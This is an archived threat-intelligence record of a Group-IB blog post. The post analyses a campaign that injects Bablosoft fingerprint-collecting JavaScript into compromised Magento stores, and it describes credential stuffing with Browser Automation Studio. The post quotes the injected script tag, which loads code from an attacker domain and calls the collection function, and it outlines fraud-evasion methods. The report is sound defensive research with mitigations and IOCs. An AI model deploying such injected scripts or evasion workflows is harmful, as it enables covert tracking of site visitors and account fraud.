{
	"id": "a70fef8c-7e36-46c9-9c26-baa5cdced17d",
	"created_at": "2026-04-06T00:22:26.91974Z",
	"updated_at": "2026-04-10T03:36:48.187636Z",
	"deleted_at": null,
	"sha1_hash": "859a1bf990fa3a01b8d8dee0d4e479bef1f322db",
	"title": "Fingerprint Heists | Group-IB Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3721629,
	"plain_text": "Fingerprint Heists | Group-IB Blog\r\nArchived: 2026-04-02 12:40:32 UTC\r\nIntroduction\r\nFraudsters are continuously seeking innovative ways to exploit unsuspecting internet users. One of the latest and\r\nmost concerning techniques revolves around browser fingerprinting — a method that allows cybercriminals to\r\nsteal unique digital identifiers associated with user online activity.\r\nWhat makes browser fingerprinting particularly alarming is its invisibility. The victim might not even know that\r\nthe fingerprint has been captured or misused. Fraudsters can bypass security measures, impersonate victims on\r\ntrusted platforms, and commit fraudulent activities—all without triggering suspicion from security systems that\r\nrely on these fingerprints for authentication.\r\nThe implications are far-reaching, affecting individuals and organisations alike. Companies that rely on browser\r\nfingerprinting to detect fraud or prevent account takeovers may find their systems rendered ineffective. For\r\nindividuals, the theft of a fingerprint can result in unexpectedly being locked out of accounts on different online\r\nservices due to false positives triggered by fraud protection or security systems.\r\nIn this blog, we’ll delve into how browser fingerprints are collected, the methods fraudsters use to steal and\r\nexploit them, and the steps you can take to protect yourself. 
Whether you’re an individual user or a business\r\nlooking to enhance security, this guide will provide the insights to stay one step ahead of cybercriminals.\r\nKey discoveries in the blog\r\nAdvanced Fingerprinting Techniques: Cybercriminals exploit sophisticated methods to extract unique\r\nbrowser characteristics without user consent.\r\nIdentified malicious campaign collecting fingerprints of unaware users: a threat actor is compromising\r\nMagento websites to inject malicious code aimed at collecting the fingerprints of visiting users.\r\nRisks for Individuals: Individuals face potential account lockouts and false positives from fraud\r\nprotection systems, which can disrupt access to multiple online services.\r\nComprehensive Insight and Protection Strategies: The blog provides an in-depth exploration of how\r\nbrowser fingerprints are collected and exploited, along with practical steps for both businesses and\r\nindividuals.\r\nWho may find this blog interesting:\r\nCybersecurity analysts and corporate security teams\r\nMalware analysts\r\nHead of Fraud Protection\r\nThreat intelligence specialists\r\nCyber investigators\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 1 of 26\n\nComputer Emergency Response Teams (CERT)\r\nLaw enforcement investigators\r\nCyber police forces\r\nFingerprinting Collection Using Compromised Magento Websites\r\nCampaign Analysis\r\nIn October 2024, Group-IB threat intelligence and fraud protection specialists identified a malicious campaign that\r\nhad been ongoing since at least May 2024. 
In this campaign, a threat actor, now tracked as ScreamedJungle,\r\ninjected a Bablosoft JS script into compromised Magento websites to collect fingerprints of visiting users.\r\nAnalyses carried out by Group-IB analysts identified the compromise of more than 115 e-commerce websites.\r\nAlthough the technique used by the threat actor to compromise Magento online stores is not known with certainty,\r\nan analysis of the compromised sites suggests that the threat actor is likely exploiting known vulnerabilities\r\naffecting vulnerable Magento versions (e.g., CVE-2024-34102 – CosmicSting, CVE-2024-20720). This\r\nassumption is supported by the fact that many of the compromised websites detected use Magento 2.3, which\r\nreached end-of-life (EOL) status and has not been supported since September 2022.\r\nBelow is an example of an injected script on compromised websites:\r\nFigure 1. Example of injected Bablosoft fingerprinting script on compromised Magento website.\r\n\u003cscript type=\"text/javascript\" charset=\"UTF-8\" src=\"hxxps://busz[.]io/j9z3GfPd?pr=1\u0026sub_id_2={victim_domain}\"\u003e\u003c/script\u003e\r\n\u003cscript\u003e\r\nif (!/Android|webOS|iPhone|iPad|BlackBerry|Windows Phone|Opera Mini|IEMobile|Mobile/i.test(navigator.userAgent))\r\n  document.addEventListener(\"DOMContentLoaded\", function(){ProcessFingerprint(false, \"5rdc71h00d6udaqhuzgxhga02ewj095nvrk6nxah6vhrb70wqmu854mevhe27mgv\")});\r\n\u003c/script\u003e\r\nAs can be observed from the image above, in most cases the injected script is hidden within an HTML\r\ncomment tag labeled `\u003c!-- Google Finger Analytics --\u003e` to give it a legitimate appearance. 
More generally, the\r\nbehavior of the JS script can be summarized as follows:\r\nThe JS script is imported from a malicious domain under the threat actor's control; in the above case it is\r\nhosted on hxxps://busz[.]io/j9z3GfPd?pr=1\u0026sub_id_2={victim_domain}, which redirects to\r\nhxxps://busz[.]io/clientsafe.js;\r\nIf the user visiting the compromised site is using a desktop device, i.e. not a mobile user\r\nagent, the ProcessFingerprint function is executed;\r\nOnce the function is executed, several parameters related to the user visiting the compromised web pages\r\nare processed and collected (e.g., browser settings, plugin list, font list, system properties and others).\r\nclientsafe.js\r\nA deeper analysis of the injected clientsafe.js script revealed that it is part of the Bablosoft\r\nBrowserAutomationStudio (BAS) suite; its purpose is to collect users’ fingerprints for later use in the Bablosoft\r\nFingerprintSwitcher module.\r\nFigure 2. FingerprintSwitcher webpage.\r\nMore specifically, the threat actor is abusing a Bablosoft solution called “CustomServers” which allows them to\r\nindependently collect fingerprints and store them in a private Bablosoft database.\r\nFor fingerprints to be saved to the private database, the threat actor must provide the ProcessFingerprint function\r\nwith a public key assigned by Bablosoft when subscribing to the CustomServers service; the public keys\r\nidentified in the campaign under analysis are as follows:\r\n5rdc71h00d6udaqhuzgxhga02ewj095nvrk6nxah6vhrb70wqmu854mevhe27mgv\r\nXc3blub4pxwvxhj0oc4ddtqgkkpm42my84uqo7hyv6zwfetg7hiwnnl9wlzwnso7\r\nFigure 3. An excerpt of CustomServers documentation.\r\nThe clientsafe.js script connects to Bablosoft’s server, retrieves encoded instructions like the PerfectCanvas\r\nrequest, and uses the eval function to run the decoded instructions in the browsers of visitors to the compromised\r\nwebsite. 
More details about PerfectCanvas and CustomServers are described later in the blog.\r\nFigure 4. How PerfectCanvas is generated on the CustomServer side.\r\nIn addition, the clientsafe.js script contains several other functions to collect information about the system and\r\nbrowser of users visiting the compromised website, such as:\r\nGetSystemFontData\r\nGetWebGPUData\r\ngetInstalledExtensions\r\nGetBatteryInfo\r\nGetWindowProperties\r\nGetDoNotTrack\r\nGetHLSSupport\r\nGetCodecsData\r\nGetUserAgentData\r\nGetMediaDevices\r\nGetVoices\r\nGetBluetoothData\r\nGetKeyboardLayout\r\nGetStorageSize\r\nGetFonts\r\nAs an example, the following is the function that leverages the Keyboard API to determine the layout used by a\r\nvisiting user:\r\nFigure 5. Function that collects information about keyboard layout.\r\nAll collected data are then sent to the Bablosoft hxxps://customfingerprints[.]bablosoft[.]com/save endpoint and saved\r\nin the threat actor's private database via the ServerPoster function.\r\nFigure 6. Function that sends collected data.\r\nFigure 7. ServerPoster function.\r\nThe following is an example of a POST request to the endpoint, transmitting a JSON payload that includes the\r\nobtained fingerprint.\r\nFigure 8. 
An excerpt of collected fingerprint transmitted via POST request.\r\nRefs:\r\nhttps://urlscan.io/responses/dcc1122bcf60d91acae0703de18ed4ac027f6d3d55eebd1e87c4f4647b2daeca/\r\nImpact – Case study: Italy\r\nTo better understand the impact of the campaign under analysis, we examined nine Italian websites that were\r\ncompromised in this campaign, some of which appear to still be infected at the time of writing, in order to\r\nestimate the number of users whose fingerprints may have been collected.\r\nTo this end, we utilized publicly available web data to estimate the traffic of the compromised sites, as well as the\r\nnumber of potential daily visitors.\r\nWebsite | Industry | Average number of monthly visitors | Average number of monthly unique visitors | Average number of daily unique visitors\r\nwebsite_1 | Medical Equipment | ~9.7k | ~5.6k | ~180\r\nwebsite_2 | Retail | ~600 | ~300 | ~10\r\nwebsite_3 | Consumer Electronics | ~56.8k | ~39.9k | ~1.3k\r\nwebsite_4 | Pharmaceutical | ~3.7k | ~1.8k | ~60\r\nwebsite_5 | Jewelry | ~77.1k | ~48k | ~1.5k\r\nwebsite_6 | Retail | ~2.5k | ~1.5k | ~50\r\nwebsite_7 | Retail | ~6.4k | ~4.1k | ~130\r\nwebsite_8 | Retail | ~35.1k | ~22.1k | ~700\r\nwebsite_9 | Fashion | ~15.5k | ~7.9k | ~250\r\nAlthough, as stated earlier, these are estimated traffic volumes for the websites and could therefore\r\ndeviate from the actual values, it is possible to observe that, for the Italian market alone, this campaign is\r\nable to potentially collect over 200,000 fingerprints of Italian users monthly.\r\nWhat is Bablosoft?\r\nBablosoft develops automation tools often linked to cybercriminal activities such as credential stuffing, fraud\r\nschemes, and data harvesting.\r\nFigure 9. Bablosoft webpage.\r\nThe core product developed by Bablosoft is BrowserAutomationStudio (BAS), a tool for automating browser-based activities that does not require coding skills. 
It allows users to create scripts that simulate human actions on\r\nwebsites, such as clicking and filling out forms. Threat actors utilize the BAS suite to automate activities against\r\nwebsites, such as credential stuffing attacks, user registrations, and data scraping. Combined with the\r\nFingerprintSwitcher module, this setup mimics legitimate user behavior, significantly reducing the likelihood of\r\ndetection.\r\nBablosoft on Underground Communities\r\nThe first known mention of BAS dates back to April 2016, when a user under the pseudonym “Atabas” sponsored\r\nthe tool on the PirateHub forum.\r\nFigure 10. First known Bablosoft-related post, originally in Russian, and translated into English.\r\nRegarding the FingerprintSwitcher module, the first known mention on the web of such a service dates back to\r\nFebruary 2017, when user “Twaego”, who is presumed to be one of the developers of the BAS suite, sponsored\r\nthe creation of the related service on the BlackHatWorld forum.\r\nFigure 11. Introduction of the BAS module to change fingerprints.\r\nAs mentioned above, the BAS suite, and all related modules, are widely used to carry out malicious activities and\r\nare a topic of interest in underground communities. In particular, its use is often seen as an alternative to other web\r\nautomation tools (e.g., openbullet), for the development of bruteforcers, checkers, autoregisters, scrapers, and\r\nmore. The following are examples of a post from developers offering their services for the development of\r\ntargeted BAS projects, and from a user looking for someone who can implement a bruteforcer to target a U.S.\r\nbank.\r\nFigure 12. BAS developers offer their services on underground forums. 
Translation: “Development on BAS |\r\nCheckers, autoregisters, parsers | Emulation/queries”. Originally in Russian, and translated into English.\r\nFigure 13. Forum user looking for a BAS developer to develop a brute-forcer targeting an American bank. English\r\ntranslation: “Looking for a brut on [REDACTED] Bank, made on BAS or analogs, stable working from 3 months,\r\nthe deal is strictly through the guarantor, payment only after full verification. Price from 200$.”\r\nCredential Stuffing with Bablosoft and FingerprintSwitcher\r\nThe technologies discussed above can be exploited by attackers in credential-stuffing campaigns. Credential\r\nstuffing is a type of attack in which attackers use stolen account credentials to attempt unauthorized access to\r\nuser accounts.\r\nTo automate the process and avoid detection, fraudsters can use different tools. By leveraging these capabilities,\r\nattackers can test thousands of stolen username-password pairs against multiple websites without triggering\r\ntraditional security mechanisms. Fingerprint spoofing ensures their requests appear as legitimate user activity,\r\nbypassing detection.\r\nAdditionally, stolen user fingerprints can have severe consequences for legitimate users. Fraudsters who reuse\r\nstolen device fingerprints can make it appear as though legitimate users’ devices are engaging in fraudulent\r\nbehavior. 
As a result, fraud protection systems may wrongfully block legitimate users, flagging their devices as\r\nhigh risk due to association with prior attacks.\r\nNote: Since credential-stuffing attacks have different variations, this specific example describes a case in which an\r\nattacker uses stolen or compromised credentials to target a specific website. The main goal is the verification of\r\naccounts for further exploitation.\r\nFigure 14. Example of BAS scripts offered in Darknet.\r\nUsing BAS, fraudsters can import a list of credentials, map out the login flow of a target website, and configure\r\nBAS to input the credentials repeatedly while monitoring for successful authentications, enhancing the\r\neffectiveness of the attacks.\r\nFigure 15. Fraud Matrix of the Account Stuffing Attack.\r\nFigure 15 shows the tactics and techniques of the Fraud Matrix framework executed during the attack. Below we will\r\ngo through the major stages in detail.\r\nReconnaissance\r\nFraudsters start by identifying targets for the attack based on factors such as the availability of reused or exposed\r\ncredentials, the presence of weak security measures, the potential value of compromised accounts, and the ability\r\nto efficiently automate attacks using preconfigured tools (e.g., Bablosoft) tailored for specific targets, such as\r\nbanks or online portals. They then investigate the structure of the targeted website in more depth, i.e. the IDs\r\nof the HTML elements they have to interact with to emulate a real user.\r\nAs the next step, fraudsters search for a list of credentials, usually referred to as a combolist, that will be used in\r\ncredential stuffing attacks against targeted websites. 
These combo lists can be obtained from various sources like\r\nunderground forums and cybercrime communities on Telegram, and then fed into the BAS database as shown in\r\nFigure 16 below.\r\nFigure 16. Database Manage in BrowserAutomation Studio.\r\nResource development, Account Access\r\nBrowser Automation Studio offers a wide range of modules that can facilitate fraudsters’ activity: filesystem and\r\nnetwork operations, IP info services, phone verification services and others. Automation of the embedded browser\r\nis based on the Chromium Embedded Framework (CEF)*. A non-exhaustive list is shown in Figure 17 below.\r\n*CEF is an open-source framework for embedding the Chromium browser stack into other applications, used by\r\nwell-known software vendors.\r\nFigure 17. Browser Automation Studio Modules.\r\nBrowser Automation Studio could be considered an IDE for visual programming. It has a lot of control blocks that\r\nrepresent common statements and logical statements, as shown in Figure 18.\r\nFigure 18. Script Logic blocks in Browser Automation Studio.\r\nThese control blocks allow for the quick creation of custom scripts that can operate with BAS modules. An\r\nexample of such a script is shown in Figure 19. The script:\r\nrequests a stolen fingerprint and applies it to an internal browser (step 1);\r\nreads credentials from the database (step 2);\r\nopens the website via the internal browser and inputs the credentials into the form on the website (step 3);\r\nidles for a while, presses the “Login” button and then waits until the page is loaded (step 4);\r\nupdates the corresponding records in the database if a specific HTML element exists (step 5).\r\nFigure 19. 
Script Editor in Browser Automation Studio.\r\nDefence evasion (Fraud Protection systems Bypass)\r\nBrowser Automation Studio offers a wide range of capabilities to bypass fraud protection systems. Some of them\r\nare implemented as part of the Bablosoft ecosystem and others are integrations with third-party services.\r\nFor example, CAPTCHA solving modules are implemented by third parties; some of them are generic and others\r\ntarget specific well-known CAPTCHA vendors.\r\nFigure 20. Captcha Solving Modules in Browser Automation Studio.\r\nAnother example of third-party integration is the phone verification module, which allows the use of temporary\r\nphone numbers.\r\nFigure 21. The example of phone number verification.\r\nThe most interesting part of the defence evasion capabilities is fingerprint spoofing. It leverages the PerfectCanvas\r\ntechnology.\r\nPerfectCanvas\r\nPerfectCanvas is a technology that allows BAS to receive fingerprints from real devices to bypass the canvas\r\nfingerprinting methods of fraud protection systems. The high-level process looks as follows:\r\n1. The canvas is first rendered on a separate, remote machine.\r\n2. The rendered canvas data is then sent to the local machine.\r\n3. The canvas data in the BAS browser is replaced with the remotely rendered data.\r\nThe key difference of this method is that the canvas data transmitted is byte-for-byte identical to that generated on\r\nthe real device, rather than being obtained by adding noise to the original canvas.\r\nTo use PerfectCanvas, the fraudster must visit the targeted site using a specialized browser called\r\nCanvasInspector, which is designed to generate the “PerfectCanvas request.”\r\nFigure 22. 
CanvasInspector.\r\nThe “PerfectCanvas request” is a string that contains all the necessary information to render the canvas on a\r\nremote machine.\r\nFigure 23. “PerfectCanvas request” for browserleaks[.]com.\r\nOnce the fraudster has the “PerfectCanvas request,” they can obtain fingerprints with the PerfectCanvas\r\nreplacement by sending a request to the server and receiving a response.\r\nFigure 24. The PerfectCanvas workflow.\r\nBablosoft offers fraudsters the CustomServers feature to pre-collect fingerprints and instantly use them in\r\nfraudulent transactions. A CustomServer is a web server that hosts the clientsafe.js script. As mentioned above, this\r\nscript generates fingerprints on demand. By injecting it into popular websites, fraudsters receive hundreds of\r\nthousands of fingerprints from the devices of unaware users per month.\r\nFigure 25. The stolen fingerprints abuse via CustomServers.\r\nPerform fraud and Monetization\r\nOnce fraudsters have prepared their scripts, they can run them on previously gathered credential databases for bulk\r\nexfiltration of useful account data (e.g., payment details and personal data). This opens an opportunity for\r\nselling higher-quality, enriched databases.\r\nAnother feature of BrowserAutomationStudio (BAS) is its ability to compile scripts into standalone executable\r\nfiles. This means that once an attacker creates a credential-stuffing script using BAS, they can package it into an\r\nexecutable program that runs independently of the BAS environment. These compiled scripts can be easily\r\ndistributed, offered, or shared with other fraudsters.\r\nFigure 26. 
Compile Script window of Browser Automation Studio.\r\nConclusion\r\nBrowser fingerprinting is a powerful technique commonly used by websites to track user activities and tailor\r\nmarketing strategies. However, this information is also exploited by cybercriminals to mimic legitimate user\r\nbehavior, evade security measures, and conduct fraudulent activities. The identification of a malicious campaign\r\nspecifically designed to compromise e-commerce websites and collect the fingerprints of unaware users\r\nunderscores the high value of this information within the cybercriminal community and highlights the need for\r\ncontinued research and analysis of the tools and techniques used for illicit purposes, enabling security teams to\r\nimprove detection capabilities and strengthen defenses against fraudulent activities.\r\nTo this end, we report below some recommendations for the different entities involved in the identified campaign.\r\nFor website owners:\r\nRegularly conduct a website analysis to evaluate its integrity and eliminate any potential persistence\r\nmechanisms or malicious files;\r\nKeep systems up-to-date and always install relevant security patches;\r\nUse complex passwords and adopt two-factor authentication;\r\nMonitor access by privileged accounts;\r\nPerform security audits (e.g., vulnerability assessments, penetration tests) periodically in order to identify\r\nthe presence of any vulnerabilities that could lead to website compromise;\r\nAdvice for end users to limit exposure of their fingerprint:\r\nUse privacy-oriented browsers that implement additional protection measures to block suspicious\r\nfingerprint scripts;\r\nUse trusted and reliable browser extensions aimed at blocking the execution of suspicious JavaScript and\r\ndetecting tracking techniques;\r\nRecommendations for cybersecurity and fraud teams for prevention and detection of attacks with 
Browser Automation Studio and\r\nIdentify changes in the known user environment, i.e. changes of operating system and metadata;\r\nSubscribe to intelligence services (i.e. threat intelligence, fraud intelligence) to stay updated on evolving\r\nfraud schemes and technologies;\r\nUse Multi-Factor Authentication (MFA) for authentication processes or sensitive user activity, i.e. for\r\npassword changes.\r\nExamples of Fraud Matrix mitigations and detections sorted by efficiency:\r\nHigh Efficiency\r\nMitigations:\r\nFraud Matrix ID | Description\r\nM2011 | Multi-Factor Authentication (MFA)\r\nM2007 | Account Use Policy\r\nM2026 | Device Binding\r\nDetections:\r\nFraud Matrix ID | Data Source | Data Component\r\nDS2020 | Network Traffic | Traffic Patterns\r\nDS2057 | Browser API | Canvas API\r\nModerate Efficiency\r\nMitigations:\r\nFraud Matrix ID | Description\r\nM2017 | User Notifications \u0026 Alerts\r\nM2015 | Geofencing\r\nDetections:\r\nFraud Matrix ID | Data Source | Data Component\r\nDS2026 | User Account | User Account Authentication\r\nDS2027 | User Account | User Account Metadata\r\nDS2001 | Dark Web | Dark Web Monitoring\r\nNote: DS2001 is useful for early detection but relies on external sources and doesn’t directly prevent attacks in\r\nreal time.\r\nMITRE ATT\u0026CK\r\nFigure 27. 
ScreamedJungle ATT\u0026CK\r\nTechnique | Description\r\nT1588.005 Obtain Capabilities: Exploits | ScreamedJungle obtained exploits to target vulnerable Magento platforms\r\nT1189 Drive-by Compromise | ScreamedJungle leverages compromised websites to inject malicious JS\r\nT1059.007 Command and Scripting Interpreter: JavaScript | The injected malicious JS is executed by the browser of users visiting compromised websites\r\nT1119 Automated Collection | Users’ fingerprint is automatically collected\r\nIndicators of Compromise (IOCs)\r\nNetwork Indicators:\r\nIndicator | Type\r\nbusz[.]io | domain\r\nhxxps://busz[.]io/j9z3GfPd?pr=1 | URL\r\nhxxps://busz[.]io/clientsafe.js | URL\r\nscreamedjungle[.]com | domain\r\nhxxps://screamedjungle[.]com/mjzNTg?pr=1 | URL\r\nhxxps://screamedjungle[.]com/clientsafe.js | URL\r\nFile indicators:\r\nSHA256 | Filename\r\ndcc1122bcf60d91acae0703de18ed4ac027f6d3d55eebd1e87c4f4647b2daeca | clientsafe.js\r\nSource: https://www.group-ib.com/blog/fingerprint-heists/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"references": [
		"https://www.group-ib.com/blog/fingerprint-heists/"
	],
	"report_names": [
		"fingerprint-heists"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7110224a-65ef-4aa6-8d82-ea5bbd70ade6",
			"created_at": "2025-03-21T02:00:03.847783Z",
			"updated_at": "2026-04-10T02:00:03.839795Z",
			"deleted_at": null,
			"main_name": "ScreamedJungle",
			"aliases": [],
			"source_name": "MISPGALAXY:ScreamedJungle",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434946,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/859a1bf990fa3a01b8d8dee0d4e479bef1f322db.pdf",
		"text": "https://archive.orkl.eu/859a1bf990fa3a01b8d8dee0d4e479bef1f322db.txt",
		"img": "https://archive.orkl.eu/859a1bf990fa3a01b8d8dee0d4e479bef1f322db.jpg"
	}
}